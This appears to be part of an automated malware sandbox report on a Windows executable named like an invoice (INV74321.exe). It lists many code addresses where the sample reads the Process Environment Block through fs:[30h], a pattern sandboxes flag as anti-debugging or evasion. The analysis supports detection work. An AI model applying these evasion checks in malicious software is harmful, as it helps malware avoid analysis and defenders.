          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFC182 mov eax, dword ptr fs:[00000030h]1_2_00AFC182
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A185 mov eax, dword ptr fs:[00000030h]1_2_00B0A185
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]1_2_00ADB1E1
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]1_2_00ADB1E1
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]1_2_00ADB1E1
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B641E8 mov eax, dword ptr fs:[00000030h]1_2_00B641E8
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0513A mov eax, dword ptr fs:[00000030h]1_2_00B0513A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0513A mov eax, dword ptr fs:[00000030h]1_2_00B0513A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF4120 mov eax, dword ptr fs:[00000030h]1_2_00AF4120
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF4120 mov eax, dword ptr fs:[00000030h]1_2_00AF4120
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF4120 mov eax, dword ptr fs:[00000030h]1_2_00AF4120
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF4120 mov eax, dword ptr fs:[00000030h]1_2_00AF4120
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF4120 mov ecx, dword ptr fs:[00000030h]1_2_00AF4120
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9100 mov eax, dword ptr fs:[00000030h]1_2_00AD9100
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9100 mov eax, dword ptr fs:[00000030h]1_2_00AD9100
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9100 mov eax, dword ptr fs:[00000030h]1_2_00AD9100
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC962 mov eax, dword ptr fs:[00000030h]1_2_00ADC962
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADB171 mov eax, dword ptr fs:[00000030h]1_2_00ADB171
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADB171 mov eax, dword ptr fs:[00000030h]1_2_00ADB171
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFB944 mov eax, dword ptr fs:[00000030h]1_2_00AFB944
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFB944 mov eax, dword ptr fs:[00000030h]1_2_00AFB944
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0FAB0 mov eax, dword ptr fs:[00000030h]1_2_00B0FAB0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]1_2_00AD52A5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]1_2_00AD52A5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]1_2_00AD52A5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]1_2_00AD52A5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD52A5 mov eax, dword ptr fs:[00000030h]1_2_00AD52A5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]1_2_00AEAAB0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]1_2_00AEAAB0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0D294 mov eax, dword ptr fs:[00000030h]1_2_00B0D294
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0D294 mov eax, dword ptr fs:[00000030h]1_2_00B0D294
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02AE4 mov eax, dword ptr fs:[00000030h]1_2_00B02AE4
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02ACB mov eax, dword ptr fs:[00000030h]1_2_00B02ACB
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B14A2C mov eax, dword ptr fs:[00000030h]1_2_00B14A2C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B14A2C mov eax, dword ptr fs:[00000030h]1_2_00B14A2C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE8A0A mov eax, dword ptr fs:[00000030h]1_2_00AE8A0A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF3A1C mov eax, dword ptr fs:[00000030h]1_2_00AF3A1C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADAA16 mov eax, dword ptr fs:[00000030h]1_2_00ADAA16
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADAA16 mov eax, dword ptr fs:[00000030h]1_2_00ADAA16
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD5210 mov eax, dword ptr fs:[00000030h]1_2_00AD5210
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD5210 mov ecx, dword ptr fs:[00000030h]1_2_00AD5210
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD5210 mov eax, dword ptr fs:[00000030h]1_2_00AD5210
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD5210 mov eax, dword ptr fs:[00000030h]1_2_00AD5210
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B1927A mov eax, dword ptr fs:[00000030h]1_2_00B1927A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8B260 mov eax, dword ptr fs:[00000030h]1_2_00B8B260
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8B260 mov eax, dword ptr fs:[00000030h]1_2_00B8B260
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8A62 mov eax, dword ptr fs:[00000030h]1_2_00BA8A62
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B64257 mov eax, dword ptr fs:[00000030h]1_2_00B64257
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9EA55 mov eax, dword ptr fs:[00000030h]1_2_00B9EA55
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9240 mov eax, dword ptr fs:[00000030h]1_2_00AD9240
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9240 mov eax, dword ptr fs:[00000030h]1_2_00AD9240
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9240 mov eax, dword ptr fs:[00000030h]1_2_00AD9240
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD9240 mov eax, dword ptr fs:[00000030h]1_2_00AD9240
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04BAD mov eax, dword ptr fs:[00000030h]1_2_00B04BAD
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04BAD mov eax, dword ptr fs:[00000030h]1_2_00B04BAD
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04BAD mov eax, dword ptr fs:[00000030h]1_2_00B04BAD
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA5BA5 mov eax, dword ptr fs:[00000030h]1_2_00BA5BA5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0B390 mov eax, dword ptr fs:[00000030h]1_2_00B0B390
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE1B8F mov eax, dword ptr fs:[00000030h]1_2_00AE1B8F
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE1B8F mov eax, dword ptr fs:[00000030h]1_2_00AE1B8F
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02397 mov eax, dword ptr fs:[00000030h]1_2_00B02397
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9138A mov eax, dword ptr fs:[00000030h]1_2_00B9138A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8D380 mov ecx, dword ptr fs:[00000030h]1_2_00B8D380
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFDBE9 mov eax, dword ptr fs:[00000030h]1_2_00AFDBE9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]1_2_00B003E2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]1_2_00B003E2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]1_2_00B003E2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]1_2_00B003E2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]1_2_00B003E2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B003E2 mov eax, dword ptr fs:[00000030h]1_2_00B003E2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B553CA mov eax, dword ptr fs:[00000030h]1_2_00B553CA
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B553CA mov eax, dword ptr fs:[00000030h]1_2_00B553CA
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9131B mov eax, dword ptr fs:[00000030h]1_2_00B9131B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B03B7A mov eax, dword ptr fs:[00000030h]1_2_00B03B7A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B03B7A mov eax, dword ptr fs:[00000030h]1_2_00B03B7A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADDB60 mov ecx, dword ptr fs:[00000030h]1_2_00ADDB60
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8B58 mov eax, dword ptr fs:[00000030h]1_2_00BA8B58
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADDB40 mov eax, dword ptr fs:[00000030h]1_2_00ADDB40
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADF358 mov eax, dword ptr fs:[00000030h]1_2_00ADF358
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE849B mov eax, dword ptr fs:[00000030h]1_2_00AE849B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B914FB mov eax, dword ptr fs:[00000030h]1_2_00B914FB
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56CF0 mov eax, dword ptr fs:[00000030h]1_2_00B56CF0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56CF0 mov eax, dword ptr fs:[00000030h]1_2_00B56CF0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56CF0 mov eax, dword ptr fs:[00000030h]1_2_00B56CF0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8CD6 mov eax, dword ptr fs:[00000030h]1_2_00BA8CD6
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0BC2C mov eax, dword ptr fs:[00000030h]1_2_00B0BC2C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA740D mov eax, dword ptr fs:[00000030h]1_2_00BA740D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA740D mov eax, dword ptr fs:[00000030h]1_2_00BA740D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA740D mov eax, dword ptr fs:[00000030h]1_2_00BA740D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91C06 mov eax, dword ptr fs:[00000030h]1_2_00B91C06
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]1_2_00B56C0A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]1_2_00B56C0A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]1_2_00B56C0A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56C0A mov eax, dword ptr fs:[00000030h]1_2_00B56C0A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF746D mov eax, dword ptr fs:[00000030h]1_2_00AF746D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6C450 mov eax, dword ptr fs:[00000030h]1_2_00B6C450
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6C450 mov eax, dword ptr fs:[00000030h]1_2_00B6C450
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A44B mov eax, dword ptr fs:[00000030h]1_2_00B0A44B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B01DB5 mov eax, dword ptr fs:[00000030h]1_2_00B01DB5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B01DB5 mov eax, dword ptr fs:[00000030h]1_2_00B01DB5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B01DB5 mov eax, dword ptr fs:[00000030h]1_2_00B01DB5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B035A1 mov eax, dword ptr fs:[00000030h]1_2_00B035A1
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA05AC mov eax, dword ptr fs:[00000030h]1_2_00BA05AC
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA05AC mov eax, dword ptr fs:[00000030h]1_2_00BA05AC
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]1_2_00AD2D8A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]1_2_00AD2D8A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]1_2_00AD2D8A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]1_2_00AD2D8A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD2D8A mov eax, dword ptr fs:[00000030h]1_2_00AD2D8A
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0FD9B mov eax, dword ptr fs:[00000030h]1_2_00B0FD9B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0FD9B mov eax, dword ptr fs:[00000030h]1_2_00B0FD9B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]1_2_00B02581
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]1_2_00B02581
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]1_2_00B02581
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B02581 mov eax, dword ptr fs:[00000030h]1_2_00B02581
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B88DF1 mov eax, dword ptr fs:[00000030h]1_2_00B88DF1
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AED5E0 mov eax, dword ptr fs:[00000030h]1_2_00AED5E0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AED5E0 mov eax, dword ptr fs:[00000030h]1_2_00AED5E0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B9FDE2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B9FDE2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B9FDE2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B9FDE2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]1_2_00B56DC9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]1_2_00B56DC9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]1_2_00B56DC9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov ecx, dword ptr fs:[00000030h]1_2_00B56DC9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]1_2_00B56DC9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B56DC9 mov eax, dword ptr fs:[00000030h]1_2_00B56DC9
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9E539 mov eax, dword ptr fs:[00000030h]1_2_00B9E539
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B5A537 mov eax, dword ptr fs:[00000030h]1_2_00B5A537
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04D3B mov eax, dword ptr fs:[00000030h]1_2_00B04D3B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04D3B mov eax, dword ptr fs:[00000030h]1_2_00B04D3B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B04D3B mov eax, dword ptr fs:[00000030h]1_2_00B04D3B
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8D34 mov eax, dword ptr fs:[00000030h]1_2_00BA8D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE3D34 mov eax, dword ptr fs:[00000030h]1_2_00AE3D34
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADAD30 mov eax, dword ptr fs:[00000030h]1_2_00ADAD30
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFC577 mov eax, dword ptr fs:[00000030h]1_2_00AFC577
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFC577 mov eax, dword ptr fs:[00000030h]1_2_00AFC577
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B13D43 mov eax, dword ptr fs:[00000030h]1_2_00B13D43
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B53540 mov eax, dword ptr fs:[00000030h]1_2_00B53540
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AF7D50 mov eax, dword ptr fs:[00000030h]1_2_00AF7D50
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B546A7 mov eax, dword ptr fs:[00000030h]1_2_00B546A7
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]1_2_00BA0EA5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]1_2_00BA0EA5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]1_2_00BA0EA5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6FE87 mov eax, dword ptr fs:[00000030h]1_2_00B6FE87
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE76E2 mov eax, dword ptr fs:[00000030h]1_2_00AE76E2
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B016E0 mov ecx, dword ptr fs:[00000030h]1_2_00B016E0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8ED6 mov eax, dword ptr fs:[00000030h]1_2_00BA8ED6
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B18EC7 mov eax, dword ptr fs:[00000030h]1_2_00B18EC7
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B8FEC0
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B036CC mov eax, dword ptr fs:[00000030h]1_2_00B036CC
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B8FE3F mov eax, dword ptr fs:[00000030h]1_2_00B8FE3F
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADE620 mov eax, dword ptr fs:[00000030h]1_2_00ADE620
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A61C mov eax, dword ptr fs:[00000030h]1_2_00B0A61C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A61C mov eax, dword ptr fs:[00000030h]1_2_00B0A61C
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC600 mov eax, dword ptr fs:[00000030h]1_2_00ADC600
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC600 mov eax, dword ptr fs:[00000030h]1_2_00ADC600
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00ADC600 mov eax, dword ptr fs:[00000030h]1_2_00ADC600
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B08E00 mov eax, dword ptr fs:[00000030h]1_2_00B08E00
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B91608 mov eax, dword ptr fs:[00000030h]1_2_00B91608
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE766D mov eax, dword ptr fs:[00000030h]1_2_00AE766D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]1_2_00AFAE73
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]1_2_00AFAE73
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]1_2_00AFAE73
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]1_2_00AFAE73
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFAE73 mov eax, dword ptr fs:[00000030h]1_2_00AFAE73
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]1_2_00AE7E41
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]1_2_00AE7E41
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]1_2_00AE7E41
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]1_2_00AE7E41
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]1_2_00AE7E41
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE7E41 mov eax, dword ptr fs:[00000030h]1_2_00AE7E41
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9AE44 mov eax, dword ptr fs:[00000030h]1_2_00B9AE44
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B9AE44 mov eax, dword ptr fs:[00000030h]1_2_00B9AE44
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57794 mov eax, dword ptr fs:[00000030h]1_2_00B57794
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57794 mov eax, dword ptr fs:[00000030h]1_2_00B57794
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B57794 mov eax, dword ptr fs:[00000030h]1_2_00B57794
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AE8794 mov eax, dword ptr fs:[00000030h]1_2_00AE8794
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B137F5 mov eax, dword ptr fs:[00000030h]1_2_00B137F5
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0E730 mov eax, dword ptr fs:[00000030h]1_2_00B0E730
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD4F2E mov eax, dword ptr fs:[00000030h]1_2_00AD4F2E
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AD4F2E mov eax, dword ptr fs:[00000030h]1_2_00AD4F2E
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6FF10 mov eax, dword ptr fs:[00000030h]1_2_00B6FF10
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B6FF10 mov eax, dword ptr fs:[00000030h]1_2_00B6FF10
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA070D mov eax, dword ptr fs:[00000030h]1_2_00BA070D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA070D mov eax, dword ptr fs:[00000030h]1_2_00BA070D
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AFF716 mov eax, dword ptr fs:[00000030h]1_2_00AFF716
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A70E mov eax, dword ptr fs:[00000030h]1_2_00B0A70E
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00B0A70E mov eax, dword ptr fs:[00000030h]1_2_00B0A70E
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00AEFF60 mov eax, dword ptr fs:[00000030h]1_2_00AEFF60
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 1_2_00BA8F6A mov eax, dword ptr fs:[00000030h]1_2_00BA8F6A
